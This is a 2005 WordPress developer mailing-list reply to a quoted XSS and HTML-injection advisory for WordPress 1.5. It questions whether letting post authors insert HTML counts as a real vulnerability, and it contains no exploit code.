[wp-hackers] Security Vulnerability found
Brian Dupuis
wordpress at coldforged.org
Wed Apr 13 14:00:50 GMT 2005
Eli Sarver wrote:
>Has this been addressed?
>
>http://soulblack.com.ar/repo/papers/wordpress_advisory.txt
>
>Title: WordPress XSS and HTML injection
>Vulnerability discovery: SoulBlack - Security Research -
>http://soulblack.com.ar
>Date: 12/04/2005
>Severity: Medium. users can obtain cookies of other users and defacement website
>Affected version: <= 1.5
>
So, blog authors can insert HTML into their titles and posts?
Admittedly, perhaps some stripping of particular elements (e.g.
"script") could/should be done, the arbitrary conversion of _all_ tags
is a bit daft. Look out for those "<em>" tags!
More information about the wp-hackers
mailing list